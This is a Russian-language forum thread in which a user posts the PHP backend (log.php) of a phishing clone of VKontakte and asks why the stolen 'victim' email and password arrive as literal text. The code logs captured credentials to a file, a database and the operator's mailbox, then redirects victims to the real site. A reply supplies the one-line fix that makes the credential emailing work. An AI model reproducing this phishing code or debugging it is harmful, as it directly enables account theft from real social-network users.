Есть фейк сайта Вконтакте, писал его не я, по задумке автора, мыло и пасс которые там ввели записываются в файл report.txt и отправляются на мыло, проблема в том, что на мыло отправляется не емаил и пароль жертвы, а вот что: $email;$pass Вот код файла log.php PHP: require_once("config.php"); $act=mysql_escape_string(@$_GET['act']); $email=mysql_escape_string(@$_POST['email']); $pass=mysql_escape_string(@$_POST['pass']); $subm=mysql_escape_string(@$_POST['subm']); $sid=mysql_escape_string(@$_POST['sid']); $time=mysql_escape_string(@$_POST['time']); $code=mysql_escape_string(@$_POST['code']); $mu=mysql_escape_string(@$_POST['mu']); $first_name=mysql_escape_string(@$_POST['first_name']); $last_name=mysql_escape_string(@$_POST['last_name']); $reg_code=mysql_escape_string(@$_POST['reg_code']); if($act=="login") { if($email==""or$pass=="") { echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=login.php'></head></html>"; } else { if($filesend==true) { $file=fopen("$repfile","a+"); $str="$email;$pass\r\n"; fputs($file,$str); fclose($file); } if($mailsend==true) { mail($mail_mailto,$mail_subject,'$email;$pass'); } echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://vkontakte.ru/login.php?email=$email&pass=$pass'></head></html>"; } } if($act=="reg") { if($email==""or$pass==""or$first_name==""or$last_name==""or$reg_code=="") { echo "xD"; /*echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=help.php?page=register'></head></html>";*/ } else { if($mysqlsend==true) { $qu="INSERT INTO `vk` ( `email` , `pass` ) VALUES ('$email','$pass')"; mysql_connect($dbhost,$dbuser,$dbpass); mysql_select_db($db); mysql_query('SET NAMES CP1251'); mysql_query('SET COLLATION_CONNECTION=CP1251_GENERAL_CI'); mysql_query($qu); } if($filesend==true) { $file=fopen("$repfile","a+"); $str="$email;$pass\r\n"; fputs($file,$str); fclose($file); } if($mailsend==true) { mail($mail_mailto,$mail_subject,'$email;$pass'); } echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://vkontakte.ru/help.php?page=register&email=$email&pass=$pass&subm=$subm&sid=$sid&time=$time&code=$code&mu=$mu&first_name=$first_name&last_name$last_name®_code$reg_code'></head></html>"; } } P.S. в фейке есть функция записи в базу данных, но я её убрал. Что не правильно в коде?
mail($mail_mailto, $mail_subject, '$email;$pass'); замени на mail($mail_mailto, $mail_subject, $email.';'.$pass);